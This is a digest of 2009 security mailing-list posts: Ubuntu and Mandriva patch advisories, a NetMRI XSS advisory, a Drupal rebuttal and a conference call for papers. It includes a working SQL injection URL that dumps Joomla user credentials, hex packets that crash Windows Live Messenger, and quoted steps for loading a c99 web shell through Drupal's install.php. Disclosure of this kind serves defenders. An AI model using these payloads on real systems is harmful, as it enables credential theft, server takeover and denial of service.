Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection

[Packet Storm]

Already discovered in June, 2008.

http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt 
bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio component version 1.0 
suffers from a remote SQL injection vulnerability.  Authored By mailto:His0k4.hlm[at]gmail.com";>His0k4

On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:
> ###
> # Advisory X
> # Title: Joomla Component com_joomradio SQL Injection
> # Author: 0o_zeus_o0 ( Arturo Z. )
> # Contact: arturo_zamor...@hotmail.com
> # Website: www.securitybroken.com
> # Date: 18/02/09
> # Risk: Medium
> # Vendor Url: http://ajaxportal.eu/
> # Affected Software: JoomRadio
> # autor script:author XrByte , Grusha 
> ##
> #
> #Example:
> ##
> #htp://
> victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION
> SELECT
> user(),concat(username,0x3a,password),user(),user(),user(),user(),user()
> FROM jos_users--
> #
> ##
> #greetz:
> #
> # original advisorie: http://www.securitybroken.com
> ##

> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

[USN-723-1] Git vulnerabilities

[Marc Deslauriers]

===
Ubuntu Security Notice USN-723-1  February 18, 2009
git-core vulnerabilities
CVE-2008-3546, CVE-2008-5516, CVE-2008-5517, CVE-2008-5916
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  git-core1.1.3-1ubuntu1.1

Ubuntu 7.10:
  git-core1:1.5.2.5-2ubuntu0.1
  gitweb  1:1.5.2.5-2ubuntu0.1

Ubuntu 8.04 LTS:
  git-core1:1.5.4.3-1ubuntu2.1
  gitweb  1:1.5.4.3-1ubuntu2.1

Ubuntu 8.10:
  git-core1:1.5.6.3-1.1ubuntu2.1
  gitweb  1:1.5.6.3-1.1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Git did not properly handle long file paths. If a user
were tricked into performing commands on a specially crafted Git repository, an
attacker could possibly execute arbitrary code with the privileges of the user
invoking the program. (CVE-2008-3546)

It was discovered that the Git web interface (gitweb) did not correctly handle
shell metacharacters when processing certain commands. A remote attacker could
send specially crafted commands to the Git server and execute arbitrary code
with the privileges of the Git web server. This issue only applied to Ubuntu
7.10 and 8.04 LTS. (CVE-2008-5516, CVE-2008-5517)

It was discovered that the Git web interface (gitweb) did not properly restrict
the diff.external configuration parameter. A local attacker could exploit this
issue and execute arbitrary code with the privileges of the Git web server.
This issue only applied to Ubuntu 8.04 LTS and 8.10. (CVE-2008-5916)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1.diff.gz
  Size/MD5: 8481 84fe19c380b31b7964b6c07a2500afee

http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1.dsc
  Size/MD5:  726 b23292f80d33ee016fcf97a4255dac6d

http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3.orig.tar.gz
  Size/MD5:   572735 4527e2a1afe3e30c0dc49455d9445dab

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-doc_1.1.3-1ubuntu1.1_all.deb
  Size/MD5:   274678 e523f354649e74138b2aec0842bda73e

http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-email_1.1.3-1ubuntu1.1_all.deb
  Size/MD5:10040 099cc4c8d98d641cb8832e1b7d767db2

http://security.ubuntu.com/ubuntu/pool/main/g/git-core/gitk_1.1.3-1ubuntu1.1_all.deb
  Size/MD5:34830 9467ee72ac93ef0f3417e76b9f7955e1

http://security.ubuntu.com/ubuntu/pool/universe/g/git-core/git-arch_1.1.3-1ubuntu1.1_all.deb
  Size/MD5:18572 eacf41e5062a143d9d959c0e2a2d4846

http://security.ubuntu.com/ubuntu/pool/universe/g/git-core/git-cvs_1.1.3-1ubuntu1.1_all.deb
  Size/MD5:17804 8bcbc71667cd93ee00b9b3034c419c43

http://security.ubuntu.com/ubuntu/pool/universe/g/git-core/git-svn_1.1.3-1ubuntu1.1_all.deb
  Size/MD5:14464 c90c396cdebda9315ec6c567c29da498

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_amd64.deb
  Size/MD5:  2175496 6d631f1b04de3816e1a2a2c2401dc527

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_i386.deb
  Size/MD5:  1783188 3dab34c13e1ccbc7e3168e55043bc185

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_powerpc.deb
  Size/MD5:  2160072 5d23dfdca43d79e68d3c85ca75c87e78

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_sparc.deb
  Size/MD5:  1819706 78da61a35bb9ad71a29c84e30bcc311f

Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.5.2.5-2ubuntu0.1.diff.gz
  Size/MD5:   144952 d83b395b7bbd2cd749d9aa5d97a83bcd

http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.5.2.5-2ubuntu0.1.dsc
  Size/MD5:  913 6da97e15925a75ff803168fea6b9b925

http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.5.2.5.orig.tar.gz
  Size/MD5:  1413507 4e8de9e56882f3214a92f6d7dc3c49ec

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-doc_1.5.2.5-2ubuntu0.1_all.deb
  Size/MD5:

[ MDVSA-2009:042 ] samba

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:042
 http://www.mandriva.com/security/
 ___

 Package : samba
 Date: February 18, 2009
 Affected: 2009.0
 ___

 Problem Description:

 Samba 3.2.0 through 3.2.6, when registry shares are enabled, allows
 remote authenticated users to access the root filesystem via a crafted
 connection request that specifies a blank share name (CVE-2009-0022).
 
 This update provides samba 3.2.7 to address this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0022
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 f9672d52051da5b814933c2f764cf665  
2009.0/i586/libnetapi0-3.2.7-0.1mdv2009.0.i586.rpm
 8395587171c03b986d6c6debe32d421d  
2009.0/i586/libnetapi-devel-3.2.7-0.1mdv2009.0.i586.rpm
 419e8930d9a83af98db87db40b532159  
2009.0/i586/libsmbclient0-3.2.7-0.1mdv2009.0.i586.rpm
 79a9ddeaad8356546d77f40e5f8823b6  
2009.0/i586/libsmbclient0-devel-3.2.7-0.1mdv2009.0.i586.rpm
 674ed223557b5c9bf137782cf7a24d89  
2009.0/i586/libsmbclient0-static-devel-3.2.7-0.1mdv2009.0.i586.rpm
 fca38c8651f2dfc79314d4184f9bbfa0  
2009.0/i586/libsmbsharemodes0-3.2.7-0.1mdv2009.0.i586.rpm
 a863211596f28dc756d79896f4e9e161  
2009.0/i586/libsmbsharemodes-devel-3.2.7-0.1mdv2009.0.i586.rpm
 f307514ed1e44e777cc852f0314b6159  
2009.0/i586/libtalloc1-3.2.7-0.1mdv2009.0.i586.rpm
 642ff276c29471425bff0536aeb9bfdf  
2009.0/i586/libtalloc-devel-3.2.7-0.1mdv2009.0.i586.rpm
 915958f5aefa05cbcf7e9932351aaec5  
2009.0/i586/libtdb1-3.2.7-0.1mdv2009.0.i586.rpm
 5b0826d63a36305f2eb55cd73bce0fb0  
2009.0/i586/libtdb-devel-3.2.7-0.1mdv2009.0.i586.rpm
 630fdfaf7ed4bb735f904c655fd7229a  
2009.0/i586/libwbclient0-3.2.7-0.1mdv2009.0.i586.rpm
 625d0733d9862bee6491695001b3f495  
2009.0/i586/libwbclient-devel-3.2.7-0.1mdv2009.0.i586.rpm
 24b1dedd7adc4a4b8f41f4049c521190  
2009.0/i586/mount-cifs-3.2.7-0.1mdv2009.0.i586.rpm
 786b41af61e1231261d8a691e051e6e8  
2009.0/i586/nss_wins-3.2.7-0.1mdv2009.0.i586.rpm
 3e7c63f3a2252d8222054a77fe51eb0b  
2009.0/i586/samba-client-3.2.7-0.1mdv2009.0.i586.rpm
 0243aebbb4d47aa1fab3e8498f2bc0ed  
2009.0/i586/samba-common-3.2.7-0.1mdv2009.0.i586.rpm
 5fb67d67607d4e70c2395917f57143a7  
2009.0/i586/samba-doc-3.2.7-0.1mdv2009.0.i586.rpm
 d7231c511a3a3e99d9c611a1942e112d  
2009.0/i586/samba-server-3.2.7-0.1mdv2009.0.i586.rpm
 196ed3589e5cbb63de16098ee947ce78  
2009.0/i586/samba-swat-3.2.7-0.1mdv2009.0.i586.rpm
 bef4656a6f1d3e1e303a82ce5a5736e8  
2009.0/i586/samba-winbind-3.2.7-0.1mdv2009.0.i586.rpm 
 20b63670ed98d96b046929b19d03b17a  2009.0/SRPMS/samba-3.2.7-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 8543b1c900940717ce87593bcd894ddd  
2009.0/x86_64/lib64netapi0-3.2.7-0.1mdv2009.0.x86_64.rpm
 f8a4585909a44f037d90f3f40f5408a7  
2009.0/x86_64/lib64netapi-devel-3.2.7-0.1mdv2009.0.x86_64.rpm
 5e8baaab26d9b709d4b04f7bde88e9a8  
2009.0/x86_64/lib64smbclient0-3.2.7-0.1mdv2009.0.x86_64.rpm
 797b7746caa92c8ea28a3e1fa218659a  
2009.0/x86_64/lib64smbclient0-devel-3.2.7-0.1mdv2009.0.x86_64.rpm
 b1ec784b83915df65a7f1d6c06ce46c3  
2009.0/x86_64/lib64smbclient0-static-devel-3.2.7-0.1mdv2009.0.x86_64.rpm
 b4cbff234e2ce3098b79887097ec1f98  
2009.0/x86_64/lib64smbsharemodes0-3.2.7-0.1mdv2009.0.x86_64.rpm
 26cd1508a8d960e01b1476d64e9a073c  
2009.0/x86_64/lib64smbsharemodes-devel-3.2.7-0.1mdv2009.0.x86_64.rpm
 c4ce64515ad474fcfc4a33ba78e8bc25  
2009.0/x86_64/lib64talloc1-3.2.7-0.1mdv2009.0.x86_64.rpm
 eff77f2eeff1b0f715da1cd6b9885122  
2009.0/x86_64/lib64talloc-devel-3.2.7-0.1mdv2009.0.x86_64.rpm
 85c16b38fa72a572ff1c09d1de454fb4  
2009.0/x86_64/lib64tdb1-3.2.7-0.1mdv2009.0.x86_64.rpm
 937d1d412b06fe68e8bd6175c5dbb967  
2009.0/x86_64/lib64tdb-devel-3.2.7-0.1mdv2009.0.x86_64.rpm
 85fd89501e053f3cd34ec78fbe140803  
2009.0/x86_64/lib64wbclient0-3.2.7-0.1mdv2009.0.x86_64.rpm
 9d2f55f2a15164e6188b967f99632572  
2009.0/x86_64/lib64wbclient-devel-3.2.7-0.1mdv2009.0.x86_64.rpm
 f90927126796e521d371749467dc115d  
2009.0/x86_64/mount-cifs-3.2.7-0.1mdv2009.0.x86_64.rpm
 e51ea5546011dee07fc7f1d1dbbdf04f  
2009.0/x86_64/nss_wins-3.2.7-0.1mdv2009.0.x86_64.rpm
 40f9be5aafb9a4e7562479fc54414825  
2009.0/x86_64/samba-client-3.2.7-0.1mdv2009.0.x86_64.rpm
 22a9db213304d56ba1837a9686694478  
2009.0/x86_64/samba-common-3.2.7-0.1mdv2009.0.x86_64.rpm
 d24f54f23ddf196170c2fe8e149e853f  
2009.0/x86_64/samba-doc-3.2.7-0.1mdv2009.0.x86_64.rpm
 b3e8420a896d9defaebc749abceb5eb2  
2009.0/x86_64/samba-server-3.2.7-0.1mdv2009.0.x86_64.rpm
 138562ffad186da5c639241c4d7971e5  
2009.0/x86_64/samba-swat-3.2.7-0.1mdv2009.0.x86_64.rpm
 cff49e288971a75d4e2b5c812ed36a53  
2009.0/x86_64/samba-winbind-3.2.7-

RE: hello bug in windows live messenger

[rasod korad]

Author :Microsoft 
Affected Software :   Windows Live Messenger Version 2009 (build 14.0.8064.XXX)
Discovered by : Mr Ha1 : Morad Quraan
Date : 16/2/2009
Greats to : Toto , Xprincezuman , Ahmad Mars , Aousq , Navelove ;)
MSN : webmas...@arabicsecurity.com
 --- - - --- --- -- --


i found Remote Denial of Service Lead WLM to Crash when you
 Change the Chartset of Msg you send to something not found 

{this packets sent form your pc when u try to send instant msg via msn}

Example :
1  192.168.1.100:2038  64.4.34.31:1863  11  Send  
  58 46 52 20 32 32 20 53 42 0D 0A   XFR 22 SB..

2  192.168.1.100:2229  64.4.37.43:1863  104  Send  
  55 53 52 20 37 39 20 77 65 62 6D 61 73 74 65 72USR 79 webmaster
0010  40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E@arabicsecurity.
0020  63 6F 6D 3B 7B 32 35 32 42 46 30 36 38 2D 38 45com;{252BF068-8E
0030  46 35 2D 34 30 33 31 2D 38 36 35 42 2D 36 45 34F5-4031-865B-6E4
0040  44 31 42 35 37 38 43 39 41 7D 20 34 36 32 33 33D1B578C9A} 46233
0050  39 35 33 38 2E 32 31 30 32 31 35 33 39 2E 32 349538.21021539.24
0060  32 31 38 33 36 37 0D 0A218367..

3  192.168.1.100:2229  64.4.37.43:1863  37  Send  
  43 41 4C 20 37 36 20 77 65 62 6D 61 73 74 65 72CAL 76 webmaster
0010  40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E@arabicsecurity.
0020  63 6F 6D 0D 0A com..

4  192.168.1.100:2229  64.4.37.43:1863  33  Send  
  43 41 4C 20 37 37 20 68 61 63 6B 5F 61 6E 79 5FCAL 77 hack_any_
0010  6F 6E 65 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D 0Do...@hotmail.com.
0020  0A .

5  192.168.1.100:2229  64.4.37.43:1863  146  Send  
  4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49MSG 78 N 132..MI
0010  4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0DME-Version: 1.0.
0020  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74.Content-Type: t
0030  65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73ext/plain; chars
0040  65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2Det=UTF-8..X-MMS-
0050  49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72IM-Format: FN=Ar
0060  61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65abic%20Transpare
0070  6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3Bnt; EF=B; CO=ff;
0080  20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2
0090  68 69  hi

if we changed the last packet number 5 to :

5  192.168.1.100:2229  64.4.37.43:1863  146  Send  
  4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49MSG 78 N 132..MI
0010  4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0DME-Version: 1.0.
0020  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74.Content-Type: t
0030  65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73ext/plain; chars
0040  65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2Det=UTF-8.0.X-MMS-
0050  49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72IM-Format: FN=Ar
0060  61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65abic%20Transpare
0070  6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3Bnt; EF=B; CO=ff;
0080  20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2
0090  68 69  hi


and resend the instant msg again to the target WLM will crash with this error :

AppName: msnmsgr.exe AppVer: 14.0.8064.206   ModName: msvcr80.dll
ModVer: 8.0.50727.1433   Offset: faa3

poc code made and its not open source coz its patched version of messenger if u 
want it tell me how to give it to u 


  

DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability

[ddvulnalert]

Title
-
DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability

Severity

Low

Date Discovered
---
January 19th 2009

Discovered By
-
Digital Defense, Inc. Vulnerability Research Team
Credit: David Marshall and r...@b13$

Vulnerability Description
-
NetMRI contains a cross-site scripting (XSS) issue whereby portions of the GET 
request are echoed back in an error page. This allows scripting tags to be 
executed by the browser to perform XSS attacks. Such an attack would require 
convincing a user to click on a specially crafted link.

Solution Description

On February 18, 2009, Netcordia released a patch named "CrossScriptPatch.gpg" 
to address this vulnerability in all currently supported versions of NetMRI 
through v3.0.1.  Customers can acquire the patch through the normal mechanisms 
or contact Netcordia Technical Support (supp...@netcordia.com) for assistance.  
Additionally, the necessary changes will be incorporated in future versions 
beginning with NetMRI v3.0.2.

Tested Systems / Software (with versions)
--
Red Hat Linux, NetMRI

Vendor Contact
--
Name: Netcordia
Website: http://www.netcordia.com/products/netmri-event-analysis.asp
Contact Information: http://www.netcordia.com/contact/index.asp

Re: LFI in Drupal CMS

[security]

Rasool Nasr replied privately with additional details:



- quote



"You must go to the profile folder and create a file with .profile

extension.Then you must copy your shell(such as c99) into created file

for example create shell .profile and then use it with this sample:



http://[sitename]/drupal/install.php?profile=shell";



- unquote





Response:



Installation profiles define which modules should be enabled, and can

customize the installation after they have been installed. This

allows customized "distributions" that enable and configure a set of

modules that work together for a specific kind of site (Drupal for

bloggers, Drupal for musicians, Drupal for developers, and so on).



Just like other Drupal directories, the profiles directory is normally

not writable by the webserver.



The reported "vulnerability" is therefore in the same league as "ZOMG

- IF YOU OVERWRITE INDEX.PHP, TEH CODE IS EXECUTED""



Regards



Heine Deelstra



--

Drupal security team

Re: SyScan'09 Call For Paper - Shanghai, Hong Kong, Singapore, Taipei

[organi...@syscan.org]

dear all

CFP for SyScan'09 Shanghai and Hong Kong will be closing in 10 days'
time. the closing date is 28th February 2009.

If you do not want to miss out on a sensational party on a chinese junk
sailing around Hong Kong's many islands and/or visiting the famous
Shanghai Bund and tasting the most delicious "little dragon dumplings",
send in your submission now.


SyScan'09 CALL FOR PAPERS/TRAINING

ABOUT SYSCAN'09
This year, SyScan'09 will be held in the 4 exciting cities of Singapore,
Shanghai, Taipei and Hong Kong. Details are as follows:

SyScan'09 Shanghai
date: 13, 14 May 2009
venue: Ramada Plaza Hotel Shanghai

SyScan'09 Hong Kong
date: 19, 20 May 2009
venue: Langham Place Hotel

SyScan'09 Singapore
date: 2, 3 July 2009
venue: Novotel Clarke Quay Hotel

SyScan'09 Taipei
date: 7, 8 July 2009
venue: NTUH International Convention Center

CFP COMMITTEE
The Call for Papers committee for SyScan’09 comprises of the following
personnel:

1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec

The CFP committee will review all submissions and determine the final
list of speakers for SyScan’09.

CONFERENCE TOPICS
The focus for SyScan’09 will include the following:

*Operating Systems *
• Vista
• Windows 7
• Linux
*Mobile Devices/Embedded systems *
• SmartPhones
• PDAs
• Game Consoles
*Web 2.0 *
• Web services
• PHP
• .Net/.asp
• Web applications
*Networking/Telecommunication *
• VoIP
• 3G/3.5G network
• IPv6
• WLAN/WiFi
• GPRS
*New Technologies*
• Chrome
• IE8
• Android
• iPhone
*Virtualization *
*Malware/Rootkits
BotNets
Security Policy/Best Practices
Legislation*
Any topics that will catch the attention of the CFP committee and/or the
world.

TRAINING TOPICS
SyScan’09 training topics will focus on the following areas:

Web Applications
Networks
Securing Windows/Linux Systems
Databases
Storage
Secure Programming/Development

PRIVILEGES
Speakers’ Privileges:
• Return economy class air-ticket for one person.
• 3 nights of accommodation.
• Breakfast, lunch and dinner during conference.
• After-conference party.
• A very healthy dose of alcohol and fun.
• S$500 cash for speakers with brand new presentations.

Trainers’ Privileges:
• 50% of net profit of class.
• 2 nights of accommodation (conference) (applicable for Singapore only).
• After-conference party.
• A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the
difference between the total fee collected for each class and the total
expenses incurred for each class. The expenses of each class would
include the return economy air-ticket of the trainer, 3 nights of
accommodation (training) and the rental of the training venue.


*CFP SUBMISSION*
CFP submission must include the following information:

1) Brief biography including list of publications and papers published
previously or training classes conducted previously.
2) Proposed presentation/training title, category, synopsis and
description.
3) Contact Information (full name, alias, handler, e-mail, postal
address, phone, fax, photo, country of origin, special dietary
requirement).
4) Employment and/or affiliations information.
5) Any significant presentation and educational/training
experience/background.
6) Why is your material different or innovative or significant or an
important tutorial?

Please note that all speakers will be allocated 50 minutes of
presentation time. Any speakers that require more time must inform the
CFP committee during the CFP submission.

Training classes will be 2 full days. Please inform the CFP committee if
your class is shorter or longer than 2 days during your CFP submission.

All submissions must be in English and in PDF format only. The more
information you provide, the better the chance for selection. Please
send submission to c...@syscan.org.


*IMPORTANT DATES *
*Shanghai*
Final CFP Submission – 28th February 2009.
Notification of Acceptance – 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) – 15th
April 2009

*Hong Kong*
Final CFP Submission – 28th February 2009.
Notification of Acceptance – 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) – 15th
April 2009.

*Singapore*
Final CFP Submission – 31st March 2009.
Notification of Acceptance – 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) – 8th May
2009.

*Taipei*
Final CFP Submission – 31st March 2009.
Notification of Acceptance – 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) – 8th May
2009.


*OTHER INFORMATION *
Please feel free to visit SyScan website to get a feel what this
conference is all about – SHARE AND HAVE FUN!

By agreeing to speak at the SyScan'09 you are granting Syscan Pte. Ltd.
the rights to reproduce, distribute, advertise and show your
presentation including but not limited to